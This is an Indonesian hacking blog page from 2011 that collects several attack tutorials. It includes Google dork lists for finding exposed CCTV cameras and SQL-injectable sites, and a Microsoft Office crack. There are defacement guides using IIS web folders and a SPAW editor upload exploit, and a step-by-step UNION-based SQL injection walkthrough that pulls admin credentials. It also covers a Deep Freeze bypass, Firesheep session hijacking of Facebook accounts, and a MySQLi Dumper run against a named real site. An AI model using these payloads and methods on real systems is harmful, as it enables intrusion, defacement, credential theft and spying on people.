Minggu, 11 Desember 2011
Rebuild file-file game menjadi ISO
Tools Web Vulnerabilities
- Backup files Security Vulnerability
- Blind SQL/XPath injection Security Vulnerability
- Code execution Security Vulnerability
- Common files Security Vulnerability
- Cookie manipulation Security Vulnerability
- CRLF injection/HTTP response splitting Security Vulnerability
- Cross Site Scripting Security Vulnerability
- Cross Site Scripting in path Security Vulnerability
- Cross Site Scripting in URI Security Vulnerability
- DELETE Method Enabled Security Vulnerability
- Directories with executables permission enabled Security Vulnerability
- Directories with write permissions enabled Security Vulnerability
- Directory Listing Security Vulnerability
- Directory Traversal Security Vulnerability
- Email address found Security Vulnerability
- File inclusion Security Vulnerability
- Full path disclosure Security Vulnerability
- Possible sensitive files Security Vulnerability
- PUT Method Enabled Security Vulnerability
- Script source code disclosure Security Vulnerability
- Sensitive data not encrypted Security Vulnerability
- Source code disclosure Security Vulnerability
- SQL injection Security Vulnerability
- TRACE method is enabled Security Vulnerability
- TRACK method is enabled Security Vulnerability
- Trojan shell script Security Vulnerability
- URL redirection Security Vulnerability
- XFS vulnerability Security Vulnerability
- XPath Injection vulnerability Security Vulnerability
office 2010 crack
Warning !
Sebelum menjalankan cracknya, harap antivirus di matikan dulu
1. Buka Folder Genuine, lalu klik aplikasinya, biarkan prosesnya selesai
2. Buka Folder Activate, lalu klik fix64bit.reg, klik yes dan ok untuk perintah selanjutnya
3. Masih di Folder Activate, klik OPP14_Activator.exe Readmore..
cctv Hack
1. Buka browser kalian,,
2. buka om/embah/paklek/dll “Google”
3. masukin syntaknya. Coba aja satu-satu
intitle:”Live View / – AXIS”
inurl:indexFrame.shtml Axis
inurl:”ViewerFrame?Mode=”
intitle:snc-rz30
inurl:home/ inurl:/view/index.shtml
inurl:”ViewerFrame?Mode=”
inurl:netw_tcp.shtml
intitle:”supervisioncam protocol”
inurl:CgiStart?page=Single
inurl:indexFrame.shtml?newstyle=Quad
intitle:liveapplet inurl:LvAppl
inurl:/showcam.php?camid inurl:video.cgi?resolution=
inurl:image?cachebust=
inurl:view/view.shtml
intext:”MOBOTIX M1″
intext:”Open Menu”
intitle:snc-rz30 inurl:home/
inurl:”MultiCameraFrame?Mode=”
intitle:”EvoCam”
inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”ViewerFrame?Mode=”
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start
inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″
intext:”Open Menu”
intext:”MOBOTIX M10″
intext:”Open Menu”
intext:”MOBOTIX D10″
intext:”Open Menu”
intitle:snc-z20
inurl:home/
intitle:snc-cs3
inurl:home/
intitle:snc-rz30
inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”
inurl:/home/home
“Kamerainformationen anzeigen”
intitle:”AXIS 2100 Network Camera Axis 2100 Network Camera 2.02″
intitle:”Linksys Web Camera” “ver”
4. klik pada link yg d inginkan,,dan akan muncul gambarnya….
5. ada beberapa kamera yg bisa kita kendalikan arahnya,, kamera ini bersifat Real-Time,,
ini trick cma buat shared doank… jika buat rusuh dll ini bkn tanggung jawab kak nakal ya.
selamat mencoba Readmore..
Dork SQl 2011
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?dec
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: filesize()
“id=” & intext:”Warning: require()
cara deface dengan web folder
Kita mungkin pernah melihat halaman yang terkena aksi jahil terhadap situs tertentu oleh para defacer.
Lalu di dalam hati akan bertanya-tanya bagaimana cara melakukan itu??
Mungkin kamu pernah membaca artikel tentang cara men-deface website dengan menggunakan teknik XSS, SQLi, LFI, RFI dll.
Namun percayalah, selain teknik tersebut masih ada teknik lain yang jauh lebih sederhana semudah copy paste file.
Bagaimana caranya??, yaitu dengan menggunakan web folder yang disediakan oleh OS Windows sendiri.
Namun perlu diketahui, teknik ini hanya berlaku untuk website yang menggunakan OS Windows dan server IIS 5.0/6.0 .
Lalu bagaimana cara mengetahui bahwa target kita menggunakan server IIS?
Mudah saja, silakan buka netcraft.com dan masukkan target kita ke textbox yang tersedia, maka akan kita dapatkan informasi website tersebut, termasuk OS dan server yang digunakan.
Jika kamu ingin mendapatkan target secara acak bisa menggunakan google dork dengan menggunakan keyword allinurl:*.asp , allinurl:*.aspx dan sebagainya.
OK, langsung kita mulai saja tutorialnya.
1. Buka My Computer lalu lihat icon web folder, lalu klik 2x icon web folder tersebut (Win 98/ME/2000).
Jika kamu menggunakan windows XP secara default tidak akan menemukan folder tersebut di My Computer, tapi kamu bisa membuat secara manual dengan membuat shortcut baru.
Berikut langkahnya :
- Klik kanan pada desktop, kemudian pilih New -> Shortcut .
- Maka akan ada popup yang meminta untuk memasukkan lokasi tujuan, lalu kamu masukkan alamat dibawah ini :
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
- Jika sudah silakan klik Next -> Next -> Finish.
- Jika shortcut nya sudah terbentuk, lalu klik 2x pada shortcut tersebut.
2.Jika kamu sudah berhasil membuka web folder tersebut kemudian klik kanan lalu pilih New – Web Folder
Lalu akan muncul popup yang meminta untuk memasukkan alamat tujuan. Sebagai contoh kamu masukkan http://www.aslty.com.cn sebagai target.
Kemudian klik Next dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu.
5. Buka folder yang sudah terbentuk, nama folder biasanya mengambil dari nama domain, jika domainnya adalah http://www.aslty.com.cn , maka nama foldernya juga http://www.aslty.com.cn.
6. Copy paste sebuah file html ke dalam web folder yang telah kamu buat ke folder www.aslty.com.cn.
nah ini aku beri contoh web yang deface bukan denganc ara web folder ^0^
ini loh
http://www.michaeljacksonforthefans.com/ Readmore..
deface spaw upload
buat ente2 yg lagi baca n nyimak dgn muka buram alias suram langsung
aja ane kasih tricknya ini mah dah pasaran dah bnyk di blog2 laen.. tpi
ane mau ulas lebih lanjut n detail sedetail2 nya
monggooo ane mulai ritual nyaa..
1.siapkan dlu komputer yg ada internetnya..
2. siapin keyboar mousenya
3.bakar kemenyannya wkowkwowko
4. star.. go n go
—————————————–STAR————————-
- masukan dlu dorknya di google ini droknya (spaw2/dialogs/) tampa tanda kurung
- cari web target
- jiak sudah dapat web target maka masukan exploidnya di blakang link webnya (spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files) tampa tanda kurung.. contoh www.contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4. masukan atau upload htm kamu di menu upload di web yg dah kamu spaw tdi…
ni contoh html uploatad n spaw qu
webnya qu sensor karna privasi.. okeehhh sampai disini dlu yaahhhh jika ada yg mau bertanya silahkan posting di bawah kolom komentar..
semoga berhasill…
“GUNAKAN KEBIJAKAN KEMAMPUAN ANDA UNTUK KEBAIKAN BERSAMA”
GOOD LUCK Readmore..
step by step sql
buat yang belum tau SQL Injection .. baca ini penting . dan yang sudah tau
mohon bantuannya untuk menjelaskan lebih rinci tentang SQL Injection
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi
client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi
clien dan juga merupakan teknik mengekspl…oitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
CONTOH
=step Satu:=
=========== carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100′ atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by
contoh:
[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)…
misal:
[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–
sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena
dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada
web tersebut karena tidak bisa menggunakan perintah
From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column
seperti ver 4 karena di ver 5 ini bisa menggunakan perintah
From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–
seumpama table yang muncul adalah “admin”
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema
.columns+where+table_name=0xhexa–
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema
.columns+where+table_name=0x61646D696E–
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–
contoh kata yang keluar adalah id,username,password
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login . Readmore..
Top tool SQL
SQLi Helper 2.7 by reiluke
Very useful tool. Just type vun website link and hit inject.
Download link:
Code : Link Download
2. darkMySQLi.py by rsauron from darkc0de.com
Code: Link Download
To use this program, you will need python. Python download link:
Code : Link Download
Code : Link Download
How to use?
1. Install Python to C:\ (or other drive, wocares)
2. Unrar darkMySQLi.py to Python25 folder
3. Go to: Start –> Run –> cmd
4. In cmd type cd C:\Python25\
5. It looks like C:\Python25. Now type python darkMySQLi.py and hit enter.
6. You will see program notes in command line. Type “–help” and program will show you all options.
3. Admin login page finder by reiluke
This program helps you to find admin login page. Remember, then you type website url, always add / on url end.
Code : Link Download
4. Blind SQLi by reiluke
Helps to dump data when you using blind SQLi.
Code : Link Download
5. Diamondhack vuln scanner
Scanning websites and shows vuns. Type dork, and wait a few minutes.
Code : Link Download
Hack, Bobol, Uninstall Deep Freeze Versi 7
Untuk masuk menjebol system keamanan di Deep Freeze 7 itu tidak sulit dan tanpa harus booting dengan menggunakan operating system lain atau membuat bootable linux di flasdisk karena selain tidak praktis juga akan memakan banyak waktu.
Anti Deepfreeze 0.4 ini adalah tool yang di gunakan untuk membuka proteksi Deepfreeze 7 sehingga anda bisa menonaktifkan Deepfreeze 7 dan meng-uninstall nya. Untuk menjebol password pada Deep Freeze 7 dan mengganti nya dengan password yang baru berikut caranya :
Password Rar : www.cyber4rt.com
2. Setelah download jalankan tool Anti Deep Freeze 0.4
3. Pada “Bypassing method” pilih “Bypass exist process”
6. Klik menu “Password”
7. Masukkan password baru anda pada “Enter New Password” dan “Confirm Password”
Berikut cara nya:
4. Klik ?apply and reboot?. Otomatis windows akan restart
Cara Uninstal Deep Freeze 7
- Klik 2x pada sofware Deep Freeze 7
- Klik “NEXT”
- Klik “Uninstal”
Jika suatu saat anda lupa kembali password nya, anda tinggal gunakan tool Anti Deep Freeze 0.4 untuk menonaktip Deep Freeze 7.
Jangan digunakan untuk menghack, menjebol, Uninstal, membobol, ataupun unlock Deep Freeze 7 pada komputer orang lain.
Selamat menggunakan Anti Deep Freeze 0.4 untuk Deep Freeze 7
Courtesy Of leitekatze.wordpress.com Readmore..
Hack Facebook dengan cookies
PERTAMA: Bagi
anda pengguna facebook yang menggunakan koneksi internet yang juga
digunakan banyak orang seperti warnet atau koneksi internet di kampus
atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati.
cara hack facebook dengan metode ini cukup mudah, berbekal software
packet sniffer yang sangat mudah di download dan digunakan untuk
memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan
mudah membobol akun facebook dengan memanfaatkan paket data yang
tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack
dengan cara ini adalah dengan berhati-hati saat mengakses facebook,
pastikan warnet atau hotspot area yang anda gunakan benar-benar aman. KEDUA: Cukup
mudah untuk hacking facebook account saat ini, kmu dapat menggunakan
firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri
sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang
tidak terenkripsi jaringan nirkabel terbuka. cara menggunakanya sebagai berikut: 1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik “Start Capturingâ€
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses
website facebook maka firesheep akan siap menghack cookies nya. nah gimana cara mencegah pencurian password dengan firesheep ini? kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/ KETIGA: Bismillah, pada
postingan kali ini akan membahas tentang bagaimana cara melakukan
sniffing paket data situs jejaring facebook yang keluar masuk dari
perangkat komputer yang digunakan untuk mengakses situs jejaring sosial
tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada
mata kuliah Keamanan Informasi dengan soal sebagai berikut: <blockquote>Anda
diminta untuk menggunakan program sniffer (penyadap) seperti wireshark,
tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah
ini:
- mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
- memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.
yang (1) yang disebut satu sesi adalah login, membaca sebuah email
(atau menulis sebuah email), kemudian logout. Jangan lupa program
sniffer diset agar *semua* data ditangkap. Biasanya default dari program
sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk
menghitung jumlah data yang ditangkap. Untuk (2) tujuannya adalah
untuk melihat pola “serangan†port scanning yang dilakukan oleh
nmap. Apakah dia melakukan scanning dengan menguji port secara
berurutan?</blockquote> langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:
- pertama-tama buka aplikasi wireshark
- kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
- pilih
interface yang ingin anda sadap paket datanya, disarankan koneksi yang
dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang
nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu
Option pada interface yang ingin Anda sadap paket datanya. - pada
bagian “Capture filter†masukkan sebagai berikut(ganti
alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk
melakukan penyadapan paket data)
host www.facebook.com and host alamat.ip.komputer.anda - Klik start, maka proses penyadapan akan segera dimulai
- Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
- Untuk
mengetahui statistik paket yang berhasil disadap, cukup dengan memilih
menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti
contoh berikut:
- hasil statistik sniffing paket data facebook
data yang saya sadap dengan menggunakan wireshark ini paket data dari
facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda
caching yang ada pada browser yang saya gunakan untuk membuka facebook
masih menyimpan data-data yang diperlukan sehingga data cukup kecil. sekian postingan kali ini.sumber:Berbagi artikel di Google! [dhani, gunslinger,*.blogspot.com,*.wordpress.com,*jasakom.com, binushacker, dll Readmore..
mysqli dumper tool
MySQLi Dumper adalah tool yang digunakan untuk me-dump database MySQL
menggunakan teknik SQL Injection. MySQLi dumper dapat memunculkan semua
data Database, tabel, kolom dan data.Tool ini juga mempunyai banyak
fitur yang menarik lainnya.
Berikut screensortnya:
1.Bagian scanner.(untuk mencari target)
Untuk mencari target,
masukkan dork di textbox di bawah tab Scanner, kita juga bisa memilih
search Engine yang kita inginkan, kita bisa menggantinya, klik saja box
yang ada disamping texbox untuk dork.
Kali ini kita mencoba menggunakan google.
Dengan dork “customer_testimonials.php?testimonial_id=”
Nah, untuk mengatur jumlah page yang akan diload untuk mencari target,kita bisa mengaturnya pada “Search Pages (Approx):
Jika pengaturan sudah selesai, sekarang waktunya mencari target, kita tinggal klik tombol “Start Scann Link”
Beberapa
saat kemudian, tunggu sampai proses selesai, targetpun akan muncul,
belum apa apa saja, saya sudah mendapat 477 target, itu pun saya tidak
menunggu sampain proses scanning selesai.
2.Untuk menscan target yang vuln SQLi , kita masuk ke tab “Vuln. SQL” lalu kita klik tombol “Start cann SQLi”
Tapi
tunggu dulu, pada bagian “Spy word to check source
SQL…bla..bla…bla” kita bisa menambahkan kata lain agar target yang
didapat lebih memuaskan.
saya menabahkan kata lain sehingga menjadi:
sql
syntax;sql erro;right syntax to use near;Warning: mysql_num_rows();You
have an error in your SQL syntax;Warning: mysql_fetch_row(): supplied
argument is not a valid MySQL result resource in;
Kita juga bisa mengganti SQLi-Inject Code dengan ‘ (quote)
Sekarang kitamulai scan.
Tunggu sampai proses selesai.
Nah, targetnya sudah kelihatan, saya mendapat 3 target yangvuln SQLi.
Sekarang waktunya kita scan jumlah kolom yang ada di web tersebut, misal target saya adalah
“http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3″
3.Untuk mencari jumlah kolom, masuk ke tab “Num.Blind”
Sekarang masukkan target ke textbox paling atas, namun sebelumnya tambahkan – setelah =
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3
Sekarang kita klik “Get Page”
Nah, keluar “The used SELECT statements have a different number of columns”
Berarti
jumlah kolomnya salah, karena ini bug osCommerce maka kemungkinan
jumlah kolomya diatas 7, jadi kita ganti angka 2 pada box di samping
tombol “Get Page” dengan angka 7.
Ternyata error sama “1222 – The used SELECT statements have a different number of columns”
Kita coba angka 8, w00t w00t…error tidak terlihat dan keluar angka 3,4,dan 6.
Sekarang kita copy url pada text box disamping tombol “Get Page Manually”
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8–
lalu kita gantikan angka yang keluar dengan [t]
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,[t],4,5,6,7,8–
4.Sekarang kita masuk ke tab Dump MySQL.
Pada bagian inilah yang seru, kita bisa melihat database, table, column, serta data yang ada di column tersebut.
Copy url tadi ke textbox yang paling atas
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,[t],4,5,6,7,8–
Pada
bagian setup kita bisa mengatur jumlah data yang dapat kita ambil, Kita
atur saja pada bagian “Max. Pages”, kali ini saya membatasi 5000 page
yang akan di load.
Jika sudah diatur, sekarang klik “Get Info” untuk mengetahui versi database version, server, dan user()
Nah, disitu sudah terpampang:
Version():5.0.67.d7-ourdelta-log
Server:Apache
User():OSC_Test5_0@64.202.163.143
Karena Version(): 5, maka kita dapat melihat nama database, table, column, serta data yang ada di web tersebut dengan mudah.
Sekarang klik “Get Data Base” beberapa saat kemudian, nama database yang ada di situs tersebutpun akan muncul,
Nah terlihat bahwa ada 2 database:
1.information_schema
2.OSC_Test5_0
Kita
pilih OSC_Test5_0, kenapa bukan information_schema ?? karena tdatabase
ini bukan database yang digunakan oleh cms pada web tersebut, yaitu
osCommerce
Lalu klik “Get Tables”
Daftar table sudah muncul (hanya sedikit karena saya tidak menunggu sampai proses selesai)
Misalkan kita memilih table “banner”, kita tinggal klik table tersebut lalu klik tombol “Get Columns”
Daftar column sudah ada:
Columnnya:
banners_group
banners_html_text
banners_id
banners_image
banners_title
banners_url
date_added
date_scheduled
date_status_change
expires_date
expires_impressions
status
Sekarang
kita blok column yang ingin kita dump datanya, gunakan ctrl sembari
mengklik column yang diinginkan, jika ingin me-dump lebih dari 1 kolom.
Jika sudah memilih, klik “Dump data (Selected Columns)”
Nah, proses dump berhasil:
banners_id banners_url status
1 http://www.oscommerce.com 0
Dengan keterangan:
banners_id= 1
banners_url= http://www.oscommerce.com
status= 0
Sekian dulu tutorial kali ini.Untuk MySQLi Dumper untuk version():4 akan dibahas lain waktu.
Link Download
Download .net framework Readmore..